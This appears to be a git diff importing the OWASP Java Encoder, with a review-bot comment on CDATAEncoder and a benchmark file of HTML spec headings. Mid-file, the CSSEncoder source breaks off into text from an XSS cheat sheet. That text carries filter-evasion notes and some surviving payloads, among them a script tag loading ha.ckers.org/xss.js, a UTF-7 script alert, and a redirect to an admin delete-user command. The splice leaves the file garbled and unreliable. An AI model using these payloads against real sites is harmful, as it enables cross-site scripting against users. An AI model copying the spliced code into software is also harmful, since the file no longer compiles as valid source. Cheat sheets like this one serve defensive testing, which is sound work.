+ if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = ']'; + i++; + break; + } else { + break; + } + } else if (ch < Character.MIN_HIGH_SURROGATE) { + if (ch > Unicode.MAX_C1_CTRL_CHAR || ch == Unicode.NEL) { + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = ch; + } else { + // C1 control code + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = XMLEncoder.INVALID_CHARACTER_REPLACEMENT; + } + } else if (ch <= Character.MAX_HIGH_SURROGATE) { + if (i + 1 < n) { + if (Character.isLowSurrogate(in[i + 1])) { + int cp = Character.toCodePoint(ch, in[i + 1]); + if (Unicode.isNonCharacter(cp)) { + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = XMLEncoder.INVALID_CHARACTER_REPLACEMENT; + ++i; + } else { + if (j + 1 >= m) { + return overflow(input, i, output, j); + } + out[j++] = ch; + out[j++] = in[++i]; + } + } else { + // high without low + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = XMLEncoder.INVALID_CHARACTER_REPLACEMENT; + } + } else if (endOfInput) { + // end of input, high without low = invalid + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = XMLEncoder.INVALID_CHARACTER_REPLACEMENT; + } else { + break; + } + } else if (// low surrogate without preceding high surrogate + ch <= Character.MAX_LOW_SURROGATE + // or non-characters + || ch > '\ufffd' + || ('\ufdd0' <= ch && ch <= '\ufdef')) + { + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = XMLEncoder.INVALID_CHARACTER_REPLACEMENT; + } else { + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = ch; + } + } + return underflow(input, i, output, j); + } + + @Override + public String toString() { + return "CDATAEncoder"; + } +} diff --git a/core/src/main/java/org/owasp/encoder/CSSEncoder.java b/core/src/main/java/org/owasp/encoder/CSSEncoder.java new file mode 100644 index 0000000..2f597b5 --- /dev/null 
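Review bot: `CDATA_END_ENCODED_LENGTH` is declared as the literal 15 independently of the `CDATA_END_ENCODED` array it describes, yet `maxEncodedLength` sizes the output from it and `encodeArrays` passes it to `System.arraycopy`, so the constant and the array can drift apart with no compile-time signal; `private static final int CDATA_END_ENCODED_LENGTH = CDATA_END_ENCODED.length;` keeps them tied together. The Javadoc on that array reads `@{code "]]>"}` where the valid inline tag is `{@code "]]>"}`. The commented-out `// } else { // // valid` branches in `firstEncodedOffset`, the `//int closeCount = 0; //unused...` line and the `// return (n - remainder) * 5 + remainder;` leftover in `maxEncodedLength` are dead code that could be dropped in a follow-up, given this commit is a verbatim upstream import. The start of this file's hunk, including the `@@` header and the class Javadoc, is garbled in the view above, so those parts were not reviewed.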
+++ b/core/src/main/java/org/owasp/encoder/CSSEncoder.java 
@@ -0,0 +1,303 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder; + +import java.nio.CharBuffer; +import java.nio.charset.CoderResult; + +/** + * CSSEncoder -- Encoder for Cascading-Style-Sheet string and URI contexts. + * Other contexts, such as color, number (w/unit), etc... are not good targets + * for "encoding" (e.g. 
you cannot encode the string "XYZ" into a number), + * they should instead by validated through other means (such as regular + * expressions). + */ +class CSSEncoder extends Encoder { + + /** Number of bits in a {@code long}. */ + static final int LONG_BITS = 64; + + /** Length of hex encoding with trailing space {@code "\## "}. */ + static final int HEX_ENCODED_LENGTH = 4; + + /** + * Encoding mode of operation--specified the set of characters that + * required encoding. + */ + enum Mode { + /** + * String contexts. Characters between quotes. + * + *
+         *   Not allowed: \n \r \f \\ " '  (everything else is allowed)
+         *   Allows: "\\{nl}" (escaped newline)
+         * 
+ */ + STRING(new ASCIIBits().set(' ', '~').clear("\"\'<&/\\>")), + + /** + * URL context. Characters inside a "url(...)". + * + *
+         *   Allowed: [!#$%&*-\[\]-~]|{nonascii}|{escape}
+         *   Escapes: \\[0-9a-f]{1,6}(\s?)
+         *            \\[^\n\r\f0-9a-f]
+         * 
+ */ + URL(new ASCIIBits().set("!#$%").set('*', '[').set(']', '~').clear("/<>")), + + // In both contexts above '<' is added to protect embedded tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equals sign or a slash in your cross site scripting attack, which has come up at least once in the real world: + +Remote style sheet part 3 +. This only works in Opera 8.0 (no longer in 9.x) but is fairly tricky. According to +RFC2616 +setting a link header is not part of the HTTP1.1 spec, however some browsers still allow it (like Firefox and Opera). The trick here is that I am setting a header (which is basically no different than in the HTTP header saying Link: ; REL=stylesheet) and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in FireFox: + +Remote style sheet part 4 +. This only works in Gecko rendering engines and works by binding an XUL file to the parent page. I think the irony here is that Netscape assumes that Gecko is safer and therefor is vulnerable to this for the vast majority of sites: + +Local htc file +. This is a little different than the above two cross site scripting vectors because it uses an .htc file which must be on the same server as the XSS vector. The example file works by pulling in the JavaScript and running it as part of the style attribute: + +List-style-image +. Fairly esoteric issue dealing with embedding images for bulleted lists. This will only work in the IE rendering engine because of the JavaScript directive. Not a particularly useful cross site scripting vector: +
  • XSS +VBscript +in an image: + +Mocha +(older versions of Netscape only): + +Livescript + +US-ASCII +encoding (found by +Kurt Huwig +). This uses malformed ASCII encoding with 7 bits instead of 8. This XSS may bypass many content filters but only works if the host transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful against web application firewall cross site scripting evasion than it is server side filter evasion. Apache Tomcat is the only known server that transmits in US-ASCII encoding. I highly suggest anyone interested in alternate encoding issues look at +my charsets issues +page: +¼script¾alert(¢XSS¢)¼/script¾ +META +(the odd thing about meta refresh is that it doesn't send a referrer in the header - so it can be used for certain types of attacks where you need to get rid of referring URLs): + +META using data: directive +URL scheme. This is nice because it also doesn't have anything visibly that has the word SCRIPT or the JavaScript directive in it, because it utilizes base64 encoding. Please see +RFC 2397 +for more details or go +or +to encode your own. You can also use the +below if you just want to encode raw HTML or JavaScript as it has a Base64 encoding method: + +META with additional URL parameter +. If the target website attempts to see if the URL contains "http://" at the beginning you can evade it with the following technique (Submitted by +Moritz Naumann +): + +IFRAME +(if iframes are allowed there are a lot of other XSS problems as well): + +FRAME +(frames have the same sorts of XSS problems as iframes): + +TABLE +(who would have thought tables were XSS targets... except me, of course): + +TD +(just like above, TD's are vulnerable to BACKGROUNDs containing JavaScript XSS vectors): +
    +DIV background-image +
    +DIV background-image with unicoded XSS +exploit (this has been modified slightly to obfuscate the url parameter). The original vulnerability was found by +Renaud Lifchitz +as a vulnerability in Hotmail: +
    +DIV background-image plus extra characters +. I built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course. (Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8.13, 12288, 65279): +
    +DIV expression +- a variant of this was effective against a real world cross site scripting filter using a newline between the colon and "expression": +
    +STYLE +tags with broken up JavaScript for XSS (this XSS at times sends IE into an infinite loop of alerts): + +STYLE attribute using a comment +to break up expression (Thanks to +Roman Ivanov +for this one): + +Anonymous HTML with STYLE attribute +(IE6.0 and Netscape 8.1+ in IE rendering engine mode don't really care if the HTML tag you build exists or not, as long as it starts with an open angle bracket and a letter): + +IMG STYLE with expression +(this is really a hybrid of the above XSS vectors, but it really does show how hard STYLE tags can be to parse apart, like above this can send IE into a loop): +exp/* +STYLE tag +(Older versions of Netscape only): + +STYLE tag using background-image + +STYLE tag using background + +Downlevel-Hidden +block (only works in IE5.0 and later and Netscape 8.1 in IE rendering engine mode). Some websites consider anything inside a comment block to be safe and therefore does not need to be removed, which allows our Cross Site Scripting vector. Or the system could add comment tags around something to attempt to render it harmless. As we can see, that probably wouldn't do the job: + +BASE +tag. Works in IE and Netscape 8.1 in safe mode. You need the // to comment out the next characters so you won't get a JavaScript error and your XSS tag will render. Also, this relies on the fact that the website uses dynamically placed images like "images/image.jpg" rather than full paths. If the path includes a leading forward slash like "/images/image.jpg" you can remove one slash from this vector (as long as there are two to begin the comment this will work): + +OBJECT +tag (if they allow objects, you can also inject virus payloads to infect the users, etc. and same with the APPLET tag). The linked file is actually an HTML file that can contain your XSS: + +Using an OBJECT tag +you can embed XSS directly (this is unverified so no browser support is added): + +Using an EMBED tag +you can embed a Flash movie that contains XSS. 
+Click here for a demo +. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info).: + +You can EMBED SVG +which can contain your XSS vector. This example only works in Firefox, but it's better than the above vector in Firefox because it does not require the user to have Flash turned on or installed. Thanks to +nEUrOO +for this one. + +Using ActionScript +inside flash can obfuscate your XSS vector: +a="get"; b="URL(\""; c="javascript:"; d="alert('XSS');\")"; eval(a+b+c+d); +XML namespace +. The htc file must be located on the same server as your XSS vector: + XSS +XML data island +with CDATA obfuscation (this XSS attack works only in IE and Netscape 8.1 in IE rendering engine mode) - vector found by +Sec Consult +while auditing Yahoo: +]]> +XML data island with comment obfuscation +(this is another take on the same exploit that doesn't use CDATA fields, but rather uses comments to break up the javascript directive): +<IMG SRC="javascript:alert('XSS')"> +Locally hosted XML with embedded JavaScript +that is generated using an XML data island. This is the same as above but instead referrs to a locally hosted (must be on the same server) XML file that contains your cross site scripting vector. You can see the result + +HTML+TIME in XML +. This is how +Grey Magic hacked Hotmail and Yahoo! +. This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode and remember that you need to be between HTML and BODY tags for this to work: + +Assuming you can only fit in a few characters and it filters against ".js" you can rename your JavaScript +file to an image as an XSS vector: + +SSI +(Server Side Includes) requires SSI to be installed on the server to use this XSS vector. 
I probably don't need to mention this, but if you can run commands on the server there are no doubt much more serious issues: + +PHP +- requires PHP to be installed on the server to use this XSS vector. Again, if you can run any scripts remotely like this, there are probably much more dire issues: +alert("XSS")'); ?> +IMG Embedded +commands - this works when the webpage where this is injected (like a web-board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc.... This is one of the lesser used but more useful XSS vectors: + +IMG Embedded commands part II +- this is more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this): +Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser +Cookie manipulation +- admittidly this is pretty obscure but I have seen a few examples where +UTF-7 +encoding - if the page that the XSS resides on doesn't provide a page charset header, or any browser that is set to UTF-7 encoding can be exploited with the following (Thanks to +for this one). Click +for an example (you don't need the charset statement if the user's browser is set to auto-detect and there is no overriding content-types on the page in Internet Explorer and Netscape 8.1 in IE rendering engine mode). This does not work in any modern browser without changing the encoding type which is why it is marked as completely unsupported. 
+Watchfire found this hole +in Google's custom 404 script.: + +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- +XSS using HTML quote encapsulation: +This was tested in IE, your mileage may vary. For performing XSS on sites that allow " +For performing XSS on sites that allow " +Another XSS to evade the same filter, "/\s]+))?)+\s*|\s*)src/i": + +Yet another XSS to evade the same filter, "/\s]+))?)+\s*|\s*)src/i". I know I said I wasn't goint to discuss mitigation techniques but the only thing I've seen work for this XSS example if you still want to allow +And one last XSS attack to evade, "/\s]+))?)+\s*|\s*)src/i" using grave accents (again, doesn't work in Firefox): + +Here's an XSS example that bets on the fact that the regex won't catch a matching pair of quotes but will rather find any quotes to terminate a parameter string improperly: + +This XSS still worries me, as it would be nearly impossible to stop this without blocking all active content: +PT SRC="http://ha.ckers.org/xss.js"> +URL string evasion (assuming "http://www.google.com/" is programmatically disallowed): +IP verses hostname: +XSS +URL encoding: +XSS +Dword encoding (Note: there are other of variations of Dword encoding - see the +IP Obfuscation calculator below +for more details): +XSS +Hex encoding (the total size of each number allowed is somewhere in the neighborhood of 240 total characters as you can see on the second digit, and since the hex number is between 0 and F the leading zero on the third hex quotet is not required): +XSS +Octal encoding (again padding is allowed, although you must keep it above 4 total characters per class - as in class A, class B, etc...): +XSS +Mixed encoding (let's mix and match base encoding and throw in some tabs and newlines - why browsers allow this, I'll never know). The tabs and newlines only work if this is encapsulated with quotes: +XSS +Protocol resolution bypass (// translates to http:// which saves a few more bytes). 
This is really handy when space is an issue too (two less characters can go a long way) and can easily bypass regex like "(ht|f)tp(s)?://" (thanks to +Ozh +for part of this one). You can also change the "//" to "\\". You do need to keep the slashes in place, however, otherwise this will be interpreted as a relative path URL. +XSS +Google "feeling lucky" part 1. Firefox uses Google's "feeling lucky" function to redirect the user to any keywords you type in. So if your exploitable page is the top for some random keyword (as you see here) you can use that feature against any Firefox user. This uses Firefox's "keyword:" protocol. You can concatinate several keywords by using something like the following "keyword:XSS+RSnake" for instance. This no longer works within Firefox as of 2.0. +XSS +Google "feeling lucky" part 2. This uses a very tiny trick that appears to work Firefox only, because if it's implementation of the "feeling lucky" function. Unlike the next one this does not work in Opera because Opera believes that this is the old HTTP Basic Auth phishing attack, which it is not. It's simply a malformed URL. If you click okay on the dialogue it will work, but as a result of the erroneous dialogue box I am saying that this is not supported in Opera, and it is no longer supported in Firefox as of 2.0: +XSS +Google "feeling lucky" part 3. This uses a malformed URL that appears to work in Firefox and Opera only, because if their implementation of the "feeling lucky" function. Like all of the above it requires that you are #1 in Google for the keyword in question (in this case "google"): +XSS +Removing cnames (when combined with the above URL, removing "www." will save an additional 4 bytes for a total byte savings of 9 for servers that have this set up properly): +XSS +Extra dot for absolute DNS: +XSS +JavaScript link location: +XSS +Content replace as attack vector (assuming "http://www.google.com/" is programmatically replaced with nothing). 
I actually used a similar attack vector against a several separate real world XSS filters by using the conversion filter itself ( +here is an example +) to help create the attack vector (IE: "java&#x09;script:" was converted into "java script:", which renders in IE, Netscape 8.1+ in secure site mode and Opera): +XSS +Character Encoding: +All the possible combinations of the character "<" in HTML and JavaScript (in UTF-8). Most of these won't render out of the box, but many of them can get rendered in certain circumstances as seen above (standards are great, aren't they?): +< %3C < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < \x3c \x3C \u003c \u003C +Character Encoding Calculator +ASCII Text: +Enter your XSS here +Hex Value: +URL: +HTML (with semicolons): +Decimal Value: +HTML (without semicolons): +Base64 Value +( +a more robust base64 calculator can be found here +) +Base64: +IP Obfuscation Calculator +IP Address: +: dword level +Dword Address: +Hex Address: +Octal Address: +Browser support reference table: +Vector works in Internet Explorer 7.0. Most recently tested with Internet Explorer 7.0.5700.6 RC1, Windows XP Professional SP2. +Vector works in Internet Explorer. Most recently tested with Internet Explorer 6.0.28.1.1106CO, SP2 on Windows 2000. +Vector works in Netscape 8.1+ in IE rendering engine mode. Most recently tested with Netscape 8.1 on Windows XP Professional. This used to be called trusted mode, but Netscape has changed it's security model away from the trusted/untrusted model and has opted towards Gecko as a default and IE as an option. +Vector works in Netscape 8.1+ in the Gecko rendering engine mode. Most recently tested with Netscape 8.1 on Windows XP Professional +Vector works in Mozilla's Gecko rendering engine, used by Firefox. Most recently tested with Firefox 2.0.0.2 on Windows XP Professional. +Vector works in Opera. 
Most recently tested with Opera 9.02, Build 8586 on Windows XP Professional +Vector works in older versions of Netscape 4.0 - untested. +Note: if a vector is not marked it either does not work or it is untested. +Written in vim, and UTF-8 encoded, for her pleasure. +All rights reserved, all wrongs observed. +© 1995-2008
diff --git a/core/src/test/resources/org/owasp/encoder/benchmark-data-2.txt b/core/src/test/resources/org/owasp/encoder/benchmark-data-2.txt
new file mode 100644
index 0000000..da3e2d0
--- /dev/null
+++ b/core/src/test/resources/org/owasp/encoder/benchmark-data-2.txt
@@ -0,0 +1,4921 @@ +"already\n started" +"already\n started" +"already started" +"current" position +"force-async" +"parser-inserted" +"ready to be parser-executed" +<fragment> +<host> +<hostport> +<meta name=""\n content=""> +<path> +<port> +<query> +<scheme> +<script type=""> +5\n February 2004 W3C Patent Policy +:active +:checked +:default +:dir(ltr) +:dir(rtl) +:disabled +:enabled +:in-range +:indeterminate +:invalid +:link +:optional +:out-of-range +:read-only +:read-write +:required +:valid +:visited +ERCIM +MIT +W3C +Name +application/x-www-form-urlencoded encoding\n algorithm +application/x-www-form-urlencoded encoding\n algorithm +data:\n URL +data:\n URL +data: URL +form element\n pointer +form element pointer +head\n element pointer +head element\n pointer +head element pointer +javascript:\n URL +javascript: URL +lang\n attribute in the XML namespace +lang\n attributes in the XML namespace +lang attribute\n in the XML namespace +lang attribute in the\n XML namespace +lang attribute in the XML\n namespace +lang attributes in\n the XML namespace +lang attributes in the\n XML namespace +multipart/form-data boundary string +multipart/form-data encoding\n algorithm +multipart/form-data encoding\n algorithm +text/plain encoding\n algorithm +dropzone processing\n steps +form element\n pointer +form element pointer +CDATASection nodes in the DOM are treated as\n equivalent to Text nodes +MediaStream and\n PeerConnection events +XMLHttpRequest +form element\n pointer +form element pointer +head element +hreflang\n attribute on a and area\n elements +html element +iframe srcdoc documents +input type keyword +javascript:\n URL +javascript: URL +in the\n Document +parent browsing context +W3C +1 Introduction +1.1 Background +1.10 Recommended reading +1.2 Audience +1.3 Scope +1.4 History +1.5 Design notes +1.5.1 Serializability of script execution +1.5.2 Compliance with other specifications +1.6 HTML vs XHTML +1.7 Structure of this specification +1.7.1 How to read 
this specification +1.7.2 Typographic conventions +1.8 A quick introduction to HTML +1.8.1 Writing secure applications with HTML +1.8.2 Common pitfalls to avoid when using the scripting APIs +1.9 Conformance requirements for authors +1.9.1 Presentational markup +1.9.2 Syntax errors +1.9.3 Restrictions on content models and on attribute values +10 Rendering +10.1 Introduction +10.2 The CSS user agent style sheet and presentational hints +10.3 Non-replaced elements +10.3.1 Hidden elements +10.3.10 The hr element +10.3.11 The fieldset element +10.3.2 The page +10.3.3 Flow content +10.3.4 Phrasing content +10.3.5 Bidirectional text +10.3.6 Sections and headings +10.3.7 Lists +10.3.8 Tables +10.3.9 Form controls +10.4 Replaced elements +10.4.1 Embedded content +10.4.2 Timed text tracks +10.4.2.1 WebVTT cue text rendering rules +10.4.2.2 Applying CSS properties to WebVTT Node Objects +10.4.2.3 CSS extensions +10.4.2.3.1 The '::cue' pseudo-element +10.4.2.3.2 The ':past' and ':future' pseudo-classes +10.4.3 Images +10.4.4 Attributes for embedded content and images +10.4.5 Image maps +10.4.6 Toolbars +10.5 Bindings +10.5.1 Introduction +10.5.10 The input element as a button +10.5.11 The marquee element +10.5.12 The meter element +10.5.13 The progress element +10.5.14 The select element +10.5.15 The textarea element +10.5.16 The keygen element +10.5.17 The time element +10.5.2 The button element +10.5.3 The details element +10.5.4 The input element as a text entry widget +10.5.5 The input element as domain-specific widgets +10.5.6 The input element as a range control +10.5.7 The input element as a color well +10.5.8 The input element as a checkbox and radio button widgets +10.5.9 The input element as a file upload control +10.6 Frames and framesets +10.7 Interactive media +10.7.1 Links, forms, and navigation +10.7.2 The title attribute +10.7.3 Editing hosts +10.7.4 Text rendered in native user interfaces +10.8 Print media +11 Obsolete features +11.1 Obsolete but conforming 
features +11.1.1 Warnings for obsolete but conforming features +11.2 Non-conforming features +11.3 Requirements for implementations +11.3.1 The applet element +11.3.2 The marquee element +11.3.3 Frames +11.3.4 Other elements, attributes and APIs +12 IANA considerations +12.1 text/html +12.2 multipart/x-mixed-replace +12.3 application/xhtml+xml +12.4 application/x-www-form-urlencoded +12.5 text/cache-manifest +12.6 web+ scheme prefix +2 Common infrastructure +2.1 Terminology +2.1.1 Resources +2.1.2 XML +2.1.3 DOM trees +2.1.4 Scripting +2.1.5 Plugins +2.1.6 Character encodings +2.2 Conformance requirements +2.2.1 Conformance classes +2.2.2 Dependencies +2.2.3 Extensibility +2.3 Case-sensitivity and string comparison +2.4 UTF-8 +2.5 Common microsyntaxes +2.5.1 Common parser idioms +2.5.10 Media queries +2.5.2 Boolean attributes +2.5.3 Keywords and enumerated attributes +2.5.4 Numbers +2.5.4.1 Signed integers +2.5.4.2 Non-negative integers +2.5.4.3 Floating-point numbers +2.5.4.4 Percentages and lengths +2.5.4.5 Lists of integers +2.5.4.6 Lists of dimensions +2.5.5 Dates and times +2.5.5.1 Months +2.5.5.2 Dates +2.5.5.3 Times +2.5.5.4 Local dates and times +2.5.5.5 Global dates and times +2.5.5.6 Weeks +2.5.5.7 Vaguer moments in time +2.5.6 Colors +2.5.7 Space-separated tokens +2.5.8 Comma-separated tokens +2.5.9 References +2.6 URLs +2.6.1 Terminology +2.6.2 Parsing URLs +2.6.3 Resolving URLs +2.6.4 URL manipulation and creation +2.6.5 Dynamic changes to base URLs +2.6.6 Interfaces for URL manipulation +2.7 Fetching resources +2.7.1 Protocol concepts +2.7.2 Encrypted HTTP and related security concerns +2.7.3 Determining the type of a resource +2.7.4 Extracting encodings from meta elements +2.7.5 CORS settings attributes +2.7.6 CORS-enabled fetch +2.8 Common DOM interfaces +2.8.1 Reflecting content attributes in IDL attributes +2.8.2 Collections +2.8.2.1 HTMLAllCollection +2.8.2.2 HTMLFormControlsCollection +2.8.2.3 HTMLOptionsCollection +2.8.3 DOMStringMap +2.8.4 
Transferable objects +2.8.5 Safe passing of structured data +2.8.6 DOM feature strings +2.8.7 Garbage collection +2.9 Namespaces +3 Semantics, structure, and APIs of HTML documents +3.1 Documents +3.1.1 Documents in the DOM +3.1.2 Security +3.1.3 Resource metadata management +3.1.4 DOM tree accessors +3.1.5 Loading XML documents +3.2 Elements +3.2.1 Semantics +3.2.2 Elements in the DOM +3.2.3 Global attributes +3.2.3.1 The id attribute +3.2.3.2 The title attribute +3.2.3.3 The lang and xml:lang attributes +3.2.3.4 The xml:base\n attribute (XML only) +3.2.3.5 The dir attribute +3.2.3.6 The class attribute +3.2.3.7 The style attribute +3.2.3.8 Embedding custom non-visible data with the data-* attributes +3.2.4 Element definitions +3.2.4.1 Attributes +3.2.5 Content models +3.2.5.1 Kinds of content +3.2.5.1.1 Metadata content +3.2.5.1.2 Flow content +3.2.5.1.3 Sectioning content +3.2.5.1.4 Heading content +3.2.5.1.5 Phrasing content +3.2.5.1.6 Embedded content +3.2.5.1.7 Interactive content +3.2.5.1.8 Palpable content +3.2.5.2 Transparent content models +3.2.5.3 Paragraphs +3.2.6 Requirements relating to bidirectional-algorithm formatting\n characters +3.2.7 WAI-ARIA +3.3 Interactions with XPath and XSLT +3.4 Dynamic markup insertion +3.4.1 Opening the input stream +3.4.2 Closing the input stream +3.4.3 document.write() +3.4.4 document.writeln() +4 The elements of HTML +4.1 The root element +4.1.1 The html element +4.10 Forms +4.10.1 Introduction +4.10.1.1 Writing a form's user interface +4.10.1.2 Implementing the server-side processing for a form +4.10.1.3 Configuring a form to communicate with a server +4.10.1.4 Client-side form validation +4.10.10 The datalist element +4.10.11 The optgroup element +4.10.12 The option element +4.10.13 The textarea element +4.10.14 The keygen element +4.10.15 The output element +4.10.16 The progress element +4.10.17 The meter element +4.10.18 Association of controls and forms +4.10.19 Attributes common to form controls +4.10.19.1 
Naming form controls +4.10.19.2 Enabling and disabling form controls +4.10.19.3 A form control's value +4.10.19.4 Autofocusing a form control +4.10.19.5 Limiting user input length +4.10.19.6 Form submission +4.10.19.7 Submitting element directionality +4.10.2 Categories +4.10.20 APIs for the text field selections +4.10.21 Constraints +4.10.21.1 Definitions +4.10.21.2 Constraint validation +4.10.21.3 The constraint validation API +4.10.21.4 Security +4.10.22 Form submission +4.10.22.1 Introduction +4.10.22.2 Implicit submission +4.10.22.3 Form submission algorithm +4.10.22.4 Constructing the form data set +4.10.22.5 URL-encoded form data +4.10.22.6 Multipart form data +4.10.22.7 Plain text form data +4.10.23 Resetting a form +4.10.3 The form element +4.10.4 The fieldset element +4.10.5 The legend element +4.10.6 The label element +4.10.7 The input element +4.10.7.1 States of the type attribute +4.10.7.1.1 Hidden state +4.10.7.1.10 Week state +4.10.7.1.11 Time state +4.10.7.1.12 Local Date and Time state +4.10.7.1.13 Number state +4.10.7.1.14 Range state +4.10.7.1.15 Color state +4.10.7.1.16 Checkbox state +4.10.7.1.17 Radio Button state +4.10.7.1.18 File Upload state +4.10.7.1.19 Submit Button state +4.10.7.1.2 Text state and Search state +4.10.7.1.20 Image Button state +4.10.7.1.21 Reset Button state +4.10.7.1.22 Button state +4.10.7.1.3 Telephone state +4.10.7.1.4 URL state +4.10.7.1.5 E-mail state +4.10.7.1.6 Password state +4.10.7.1.7 Date and Time state +4.10.7.1.8 Date state +4.10.7.1.9 Month state +4.10.7.2 Common input element attributes +4.10.7.2.1 The autocomplete attribute +4.10.7.2.10 The min and max attributes +4.10.7.2.11 The step attribute +4.10.7.2.12 The placeholder attribute +4.10.7.2.2 The dirname attribute +4.10.7.2.3 The list attribute +4.10.7.2.4 The readonly attribute +4.10.7.2.5 The size attribute +4.10.7.2.6 The required attribute +4.10.7.2.7 The multiple attribute +4.10.7.2.8 The maxlength attribute +4.10.7.2.9 The pattern attribute 
+4.10.7.3 Common input element APIs +4.10.7.4 Common event behaviors +4.10.8 The button element +4.10.9 The select element +4.11 Interactive elements +4.11.1 The details element +4.11.2 The summary element +4.11.3 The command element +4.11.4 The menu element +4.11.4.1 Introduction +4.11.4.2 Building menus and toolbars +4.11.4.3 Context menus +4.11.4.4 Toolbars +4.11.5 Commands +4.11.5.1 Using the a element to define a command +4.11.5.2 Using the button element to define a command +4.11.5.3 Using the input element to define a command +4.11.5.4 Using the option element to define a command +4.11.5.5 Using the command element to define\n a command +4.11.5.6 Using the accesskey attribute on a label element to define a command +4.11.5.7 Using the accesskey attribute on a legend element to define a command +4.11.5.8 Using the accesskey attribute to define a command on other elements +4.12 Links +4.12.1 Introduction +4.12.2 Links created by a and area elements +4.12.3 Following hyperlinks +4.12.4 Link types +4.12.4.1 Link type "alternate" +4.12.4.10 Link type "search" +4.12.4.11 Link type "stylesheet" +4.12.4.12 Link type "tag" +4.12.4.13 Sequential link types +4.12.4.13.1 Link type "next" +4.12.4.13.2 Link type "prev" +4.12.4.14 Other link types +4.12.4.2 Link type "author" +4.12.4.3 Link type "bookmark" +4.12.4.4 Link type "help" +4.12.4.5 Link type "icon" +4.12.4.6 Link type "license" +4.12.4.7 Link type "nofollow" +4.12.4.8 Link type "noreferrer" +4.12.4.9 Link type "prefetch" +4.13 Common idioms without dedicated elements +4.13.1 The main part of the content +4.13.2 Bread crumb navigation +4.13.3 Tag clouds +4.13.4 Conversations +4.13.5 Footnotes +4.14 Matching HTML elements using selectors +4.14.1 Case-sensitivity +4.14.2 Pseudo-classes +4.2 Document metadata +4.2.1 The head element +4.2.2 The title element +4.2.3 The base element +4.2.4 The link element +4.2.5 The meta element +4.2.5.1 Standard metadata names +4.2.5.2 Other metadata names +4.2.5.3 Pragma directives 
+4.2.5.4 Other pragma directives +4.2.5.5 Specifying the document's character encoding +4.2.6 The style element +4.2.7 Styling +4.3 Scripting +4.3.1 The script element +4.3.1.1 Scripting languages +4.3.1.2 Restrictions for contents of script elements +4.3.1.3 Inline documentation for external scripts +4.3.1.4 Interaction of script elements and XSLT +4.3.2 The noscript element +4.4 Sections +4.4.1 The body element +4.4.10 The address element +4.4.11 Headings and sections +4.4.11.1 Creating an outline +4.4.2 The section element +4.4.3 The nav element +4.4.4 The article element +4.4.5 The aside element +4.4.6 The h1, h2, h3, h4, h5, and h6 elements +4.4.7 The hgroup element +4.4.8 The header element +4.4.9 The footer element +4.5 Grouping content +4.5.1 The p element +4.5.10 The dd element +4.5.11 The figure element +4.5.12 The figcaption element +4.5.13 The div element +4.5.2 The hr element +4.5.3 The pre element +4.5.4 The blockquote element +4.5.5 The ol element +4.5.6 The ul element +4.5.7 The li element +4.5.8 The dl element +4.5.9 The dt element +4.6 Text-level semantics +4.6.1 The a element +4.6.10 The time element +4.6.11 The code element +4.6.12 The var element +4.6.13 The samp element +4.6.14 The kbd element +4.6.15 The sub and sup elements +4.6.16 The i element +4.6.17 The b element +4.6.18 The u element +4.6.19 The mark element +4.6.2 The em element +4.6.20 The ruby element +4.6.21 The rt element +4.6.22 The rp element +4.6.23 The bdi element +4.6.24 The bdo element +4.6.25 The span element +4.6.26 The br element +4.6.27 The wbr element +4.6.28 Usage summary +4.6.3 The strong element +4.6.4 The small element +4.6.5 The s element +4.6.6 The cite element +4.6.7 The q element +4.6.8 The dfn element +4.6.9 The abbr element +4.7 Edits +4.7.1 